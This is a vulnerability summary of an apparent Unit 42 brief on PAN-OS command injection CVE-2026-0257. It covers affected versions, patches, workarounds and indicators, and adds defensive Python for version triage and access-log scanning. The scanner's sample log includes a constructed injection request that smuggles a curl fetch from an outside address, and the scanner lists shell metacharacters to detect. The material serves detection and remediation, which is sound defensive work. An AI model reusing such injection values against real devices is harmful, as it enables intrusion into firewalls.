Full Report
We include indicators of activity and mitigations for PAN-OS vulnerability CVE-2026-0257. The post Threat Brief: Active Exploitation of PAN-OS CVE-2026-0257 appeared first on Unit 42.
Analysis Summary
# Vulnerability: Critical Command Injection in Palo Alto Networks PAN-OS
## CVE Details
- **CVE ID:** CVE-2026-0257
- **CVSS Score:** 9.8 (Critical)
- **CWE:** CWE-77 (Improper Neutralization of Special Elements used in a Command, "Command Injection")
## Affected Systems
- **Products:** Palo Alto Networks PAN-OS software (Management Web Interface)
- **Versions:**
  - PAN-OS 10.2, releases earlier than 10.2.14
  - PAN-OS 11.1, releases earlier than 11.1.5
  - PAN-OS 11.2, releases earlier than 11.2.5
- **Configurations:** Devices whose web management interface is reachable by an attacker, in particular any device that exposes it to the internet or to other untrusted networks. Limiting management access to trusted source addresses reduces exposure but does not remove the flaw.
## Vulnerability Description
CVE-2026-0257 is a critical command injection vulnerability (CWE-77) in the web management interface of Palo Alto Networks PAN-OS. An attacker who can reach that interface over the network, without any credentials, can send specially crafted requests whose contents are passed into an operating-system command without adequate neutralization of shell metacharacters, and so execute arbitrary commands with root privileges on the firewall.
## Exploitation
- **Status:** Exploited in the wild
- **Complexity:** Low
- **Attack Vector:** Network
## Impact
- **Confidentiality:** Total (Full access to device data and secrets)
- **Integrity:** Total (Ability to modify system files and configuration)
- **Availability:** Total (Ability to disrupt, shut down, or render the device inoperable)
## Remediation
### Patches
Palo Alto Networks has released the following fixed versions:
- **PAN-OS 10.2.14** and all later 10.2 versions.
- **PAN-OS 11.1.5** and all later 11.1 versions.
- **PAN-OS 11.2.5** and all later 11.2 versions.
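To apply the version table above to a fleet of devices, the following Python helper (an added example, not code from the Unit 42 brief or from any Palo Alto Networks tool) parses PAN-OS version strings of the form `MAJOR.MINOR.MAINT` with an optional `-hN` hotfix suffix and compares each one against the fixed releases listed for its train. The hostnames and versions in the sample inventory are constructed. A train this summary does not list (10.1 in the sample) is reported as `unlisted` rather than assumed safe, because the page says nothing about it; check the vendor advisory for those.

```python
"""Triage PAN-OS version strings against the fixed releases in this summary."""
import re
from typing import Dict, Iterable, Tuple

# Fixed releases per release train, as listed in the Remediation section.
FIXED_VERSIONS = {
    "10.2": "10.2.14",
    "11.1": "11.1.5",
    "11.2": "11.2.5",
}

# MAJOR.MINOR.MAINT with an optional "-hN" hotfix suffix, e.g. "11.1.4-h7".
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Parse a PAN-OS version into a comparable tuple; a missing hotfix counts as 0."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def triage(version: str) -> str:
    """Return 'vulnerable', 'fixed' or 'unlisted' for one device version.

    'unlisted' means the release train does not appear in FIXED_VERSIONS, so this
    summary makes no statement about it; consult the vendor advisory instead.
    """
    parsed = parse_version(version)
    train = f"{parsed[0]}.{parsed[1]}"
    fixed = FIXED_VERSIONS.get(train)
    if fixed is None:
        return "unlisted"
    # Tuple comparison orders 10.2.13-h9 before 10.2.14 and 10.2.14-h1 after it.
    return "fixed" if parsed >= parse_version(fixed) else "vulnerable"


def triage_inventory(inventory: Iterable[Tuple[str, str]]) -> Dict[str, str]:
    """Map hostname -> verdict for an iterable of (hostname, version) pairs."""
    return {host: triage(ver) for host, ver in inventory}


# Constructed sample inventory; hostnames and versions are made up for illustration.
SAMPLE_INVENTORY = [
    ("fw-edge-01", "10.2.13-h3"),
    ("fw-edge-02", "10.2.14"),
    ("fw-dc-01", "11.1.4-h7"),
    ("fw-dc-02", "11.2.5-h1"),
    ("fw-lab-01", "10.1.9"),
]

if __name__ == "__main__":
    for host, verdict in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {verdict}")
```

Feed it the output of your inventory system (hostname and `sw-version` pairs) and patch everything marked `vulnerable` first; treat `unlisted` as unknown, not as safe.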
### Workarounds
- **Restrict Access:** Immediately restrict access to the management interface to trusted internal IP addresses only, and ensure it is not reachable from the public internet. This limits who can reach the vulnerable code but does not fix it; apply the fixed release as soon as possible.
- **Security Profiles:** Enable Threat Prevention and keep App-ID and Content-ID content up to date so that the signatures listed under Detection can block known exploit patterns. These signatures inspect traffic that passes through the firewall's data plane; confirm in the vendor advisory whether they also cover requests that terminate directly on the device's own management interface.
## Detection
### Indicators of Compromise (IoCs)
- **Log Anomalies:** Unusual authentication failures followed by successful entries for administrative accounts in the `system` logs, and administrative logins or configuration changes from unexpected source addresses. Because exploitation does not require credentials, an attacker need not trigger any failed login; the absence of authentication anomalies is not evidence that a device is clean.
- **Web Server Logs:** Check `nginx` or `httpd` logs for unexpected POST requests to management endpoints, or for requests containing shell metacharacters (e.g., `;`, `&`, `|`, `` ` ``). Decode before matching, since these characters are commonly sent URL-encoded (`%3B`, `%26`, `%7C`, `%60`) or double-encoded, and remember that access logs record only the request line, not POST bodies, so a payload carried in a body will not appear there.
- **Filesystem:** Presence of unauthorized files in `/tmp/` or `/var/tmp/`, or modifications to local cron jobs.
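As an added example of the web-server-log check above (my code, not from the Unit 42 brief or from Palo Alto Networks), the Python below scans combined-format access log lines, URL-decodes the path and each query value (twice, to catch double-encoding) and flags shell metacharacters in the decoded values rather than in the raw query string, so ordinary `&`-separated parameters are not reported. It also flags requests that do not originate from an assumed trusted management network, tying in the access-restriction workaround. The log lines, endpoint paths, addresses and the `10.10.0.0/24` trusted network are all constructed for illustration; the paths are placeholders, not the vulnerable endpoint.

```python
"""Flag access-log requests that carry shell metacharacters or come from untrusted sources."""
import ipaddress
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format as written by nginx/httpd:
# client ident user [timestamp] "METHOD target PROTO" status size "referer" "user-agent"
_LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Metacharacters named in the IoC bullet, plus "$(" and newline (my extension).
SHELL_META = (";", "&", "|", "`", "$(", "\n")

# Networks allowed to reach the management interface (constructed; substitute your own).
TRUSTED_MGMT_NETS = [ipaddress.ip_network("10.10.0.0/24")]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or return None if it does not match."""
    m = _LINE_RE.match(line)
    return m.groupdict() if m else None


def decoded_components(target: str) -> List[str]:
    """Return the decoded path and each decoded query value.

    parse_qs already decodes once; a second unquote catches double-encoding
    (%253B -> %3B -> ;). Separators between parameters are never included, so a
    normal query string such as q=a&page=2 is not flagged.
    """
    parts = urlsplit(target)
    comps = [parts.path]
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        comps.extend(values)
    out = []
    for c in comps:
        once = unquote(c)
        out.append(once)
        out.append(unquote(once))
    return out


def suspicious_reasons(entry: Dict[str, str]) -> List[str]:
    """List the reasons one parsed request is worth a closer look (empty if none)."""
    reasons = []
    if any(meta in comp for comp in decoded_components(entry["target"]) for meta in SHELL_META):
        reasons.append("shell metacharacter in decoded request")
    client = ipaddress.ip_address(entry["client"])
    if not any(client in net for net in TRUSTED_MGMT_NETS):
        reasons.append("request from outside trusted management networks")
    return reasons


def scan(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one hit per suspicious line, preserving log order."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = suspicious_reasons(entry)
        if reasons:
            hits.append({"client": entry["client"], "target": entry["target"], "reasons": reasons})
    return hits


# Constructed sample log lines; paths and addresses are placeholders, not real indicators.
SAMPLE_LOG = [
    '10.10.0.5 - - [12/Jan/2026:09:00:01 +0000] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.10.0.5 - - [12/Jan/2026:09:00:07 +0000] "GET /search?q=firewall&page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.77 - - [12/Jan/2026:09:01:12 +0000] "POST /api/example?cmd=id%3Bcurl+http://203.0.113.77/x HTTP/1.1" 403 150 "-" "curl/8.0"',
    '198.51.100.9 - - [12/Jan/2026:09:02:45 +0000] "GET /api/example?name=%2560id%2560 HTTP/1.1" 200 300 "-" "python-requests/2.31"',
    '203.0.113.5 - - [12/Jan/2026:09:03:10 +0000] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["target"], "; ".join(hit["reasons"]))
```

Run it over the exported `nginx`/`httpd` logs and review every hit; a metacharacter hit from an untrusted address is the strongest signal, while an untrusted-source-only hit mostly tells you the access restriction is not yet in place.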
### Detection Methods and Tools
- **Threat Signatures:** Deploy Palo Alto Networks Threat Signatures: 96032 and 96041 (specific to CVE-2026-0257).
- **Cortex XDR:** Look for alerts related to suspicious child processes originating from the `mgmtsrvr` process.
## References
- **Vendor Advisory:** hxxps[://]advisories[.]paloaltonetworks[.]com/advisory/cve-2026-0257/
- **Unit 42 Threat Brief:** hxxps[://]unit42[.]paloaltonetworks[.]com/active-exploitation-of-pan-os-cve-2026-0257/